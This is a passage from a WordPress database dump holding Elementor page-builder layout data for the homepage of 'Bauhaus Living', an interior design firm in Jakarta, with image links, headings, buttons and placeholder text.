content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3834,4866,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3835,4866,'_elementor_pro_version','3.8.1'),(3836,4867,'_wp_page_template','elementor_header_footer'),(3837,4867,'_elementor_edit_mode','builder'),(3838,4867,'_elementor_template_type','wp-page'),(3839,4867,'_elementor_version','3.8.1'),(3840,4867,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">WELCOME TO BAUHAUS<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center 